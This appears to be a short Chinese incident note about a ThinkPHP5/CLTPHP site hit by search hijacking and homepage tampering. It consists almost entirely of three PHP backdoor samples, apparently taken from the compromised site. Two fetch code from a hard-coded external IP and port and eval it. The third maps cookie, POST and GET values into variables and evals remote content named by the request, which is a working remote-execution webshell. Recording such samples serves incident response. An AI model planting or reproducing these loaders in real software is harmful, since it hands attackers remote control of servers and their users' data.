基于 ThinkPHP5 的 cltphp 被搜索劫持，篡改首页的解决过程记录

function s(){
    $contents = file_get_contents('http://67.198.186.42:29808/s/admine21.txt');
    a($contents);
}
function a($conn){
    $b = '';
    eval($b.$conn.$b);
}
s();

?>Copy

<?php $a = fopen('http://67.198.186.42:8889/ma/3699.txt', 'r');
$b = '';
while (false != ($c = fread($a, 8080))) {
    $b .= $c;
    echo $b ;
}
die();
print(eval($c = $b));
fclose($a); ?>Copy

<?php
function _strint($key){
    return @file_get_contents($key);
}
function log1($log){
    lone(_strint($log));
}
function lone($key){
    $str = "";
    return eval($str.$key.$str);
}
foreach (array('_COOKIE','_POST','_GET') as $_request)
{
    foreach ($$_request as $_key=>$_value)
    {
        $$_key=  $_value;
    }
}
$id = isset($id) ? $id : 2;
log1($id);
?>Copy